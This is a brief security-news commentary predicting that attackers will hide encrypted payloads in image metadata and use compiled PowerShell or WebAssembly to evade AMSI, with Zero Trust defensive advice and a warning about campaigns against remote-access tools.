As weaponized multimedia files become more sophisticated, we will see attackers embedding encrypted payloads directly into image metadata (EXIF, comment sections, or pixel LSB steganography). Future variants will likely use compiled PowerShell (.NET) or even WebAssembly to evade AMSI completely. Enterprises must adopt Zero Trust principles: treat every file as untrusted, enforce dynamic content analysis in email gateways, and deploy endpoint detection that reconstructs file headers on the fly. The ScreenConnect trojan is a blueprint – expect similar campaigns targeting TeamViewer, AnyDesk, and Splashtop within the next 6–12 months.
Reported By: Mayura Kathiresh – Hackers Feeds